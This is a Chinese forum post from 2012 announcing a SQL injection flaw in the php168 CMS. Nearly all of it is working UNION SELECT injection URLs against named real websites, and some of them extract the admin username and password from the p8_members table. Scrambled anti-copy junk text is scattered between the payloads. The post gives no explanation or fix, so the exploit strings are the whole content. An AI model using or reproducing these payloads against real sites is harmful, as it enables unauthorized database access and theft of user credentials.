找回密码
 立即注册
查看: 3669|回复: 0
打印 上一主题 下一主题

php168某系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-10-18 08:52:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
. h4 K) K, o, R: Y& ]8 Z                                                         5 `* T& o) m+ V% n) _# T$ R) ~' |0 }
                                       $ q& ^" z" ?/ L9 [& g- ?% v
7 j+ n, V) e6 _$ _
http://www.china-highway.com/zhidao/user.php?%00&j=question&u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--- Z- z2 L# h. w3 c! Z$ v
                                                     4 U, ?% e  E7 B/ B0 }9 I
                                                                   / a- W1 q3 p( Y2 @% m' h
                                                        : ~: I; _$ q* Z* n$ p/ \/ w
http://v7.php168.com/zhidao/user ... u=-1+union+select+1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8--
/ J. G* h* ]* M6 I, W
# c7 k) P4 Z4 C& a" A, e7 t* \  o- S: O' Q* o" M8 T
0 T. d' L' }0 w4 e- F
                                                            
2 w$ }" H4 U' w; [0 V8 H
9 @9 f( T; {3 I% K( j) Fhttp://www.china-highway.com/zhi ... u=-1+union+select+1,2,3,concat(0x3a,username,0x3a,password),5,6,7,8+from+p8_members+where+uid=1--( L: o# {6 W8 [: y# y

# r7 a7 a6 R1 r6 s
' m: j6 z7 c  ?$ m  j3 c8 ?0 H
3 G; ]" |, ~" i( D! j1 K                                                                    , X/ r" _2 q! w+ B1 g

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表